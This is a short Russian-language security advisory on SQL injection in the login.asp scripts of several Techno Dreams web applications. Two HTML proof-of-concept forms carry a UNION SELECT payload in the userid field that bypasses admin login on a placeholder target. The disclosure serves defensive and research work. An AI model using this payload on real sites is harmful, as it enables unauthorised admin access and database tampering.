Программа: 
Techno Dreams Web Directory
Techno Dreams Mailing List
Techno Dreams Guest Book
Techno Dreams Announcement 

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.
Уязвимость обнаружена в сценарии login.asp при обработке входных данных пользователей. Удаленный пользователь может послать специально сформированный POST запрос и выполнить произвольные SQL команды в базе данных приложения. 

Пример:

<html>
< h1>Techno Dreams Announcement — Guestbook — WebDirectory Script
Login-Bypass PoC — Kapda `s advisory </h1>
< p> Discovery and exploit by farhadkey [at} kapda.ir</p>
< p><a href=»http://www.kapda.ir/»> Kapda — Security Science Researchers Institute
of Iran</a></p>
< form method=»POST» action=»http://target/admin/login.asp»>
< input type=»hidden» name=»userid» value=»‘union all select ‘1’,’1′ from admin where »='»>
< input type=»hidden» name=»passwd» value=»1″>
< input type=»submit» value=»Submit» name=»submit»>
< /form></html>

<html>
< h1>Techno Dreams Mailing List Script Login-Bypass PoC — Kapda `s advisory </h1>
< p> Discovery and exploit by farhadkey [at} kapda.ir</p>
< p><a href=»http://www.kapda.ir/»> Kapda — Security Science Researchers Institute
of Iran</a></p>
< form method=»POST» action=»http://target/login.asp»>
< input type=»hidden» name=»userid» value=»‘union all select ‘1’,’1′ from admin where »='»>
< input type=»hidden» name=»passwd» value=»1″>
< input type=»submit» value=»Submit» name=»submit»>
< /form></html>



Оставить мнение